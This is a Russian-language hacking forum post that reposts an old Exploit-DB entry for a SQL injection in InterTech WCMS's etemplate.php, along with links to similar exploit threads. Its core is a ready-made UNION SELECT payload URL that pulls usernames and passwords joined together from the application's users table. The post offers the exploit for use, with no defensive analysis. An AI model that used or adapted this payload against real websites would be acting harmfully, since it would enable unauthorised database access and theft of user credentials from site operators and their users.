Exploit InterTech WCMS - 'etemplate.php' SQL Injection

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 367 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

#1

EDB-ID: 32413

Проверка EDB

Пройдено

Автор: GENIUS IRAQI

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: null

Дата публикации: 2008-09-23

Код:

source: https://www.securityfocus.com/bid/31350/info

InterTech Web Content Management System (WCMS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit InterTech Co 1.0 - SQL Injection

Ответы: 0

Просмотры: 281

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit rgb72 WCMS 1.0 - 'index.php' SQL Injection

Ответы: 0

Просмотры: 322

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WCMS 1.0b - 'news_detail.asp' SQL Injection

Ответы: 0

Просмотры: 268

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit WCMS 1.0b - Arbitrary Add Admin

Ответы: 0

Просмотры: 265

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit PHP wcms XT 0.0.7 - Multiple Remote File Inclusions

Ответы: 0

Просмотры: 283

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit N/X WCMS 4.1 - 'nxheader.inc.php' Remote File Inclusion

Ответы: 0

Просмотры: 258

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.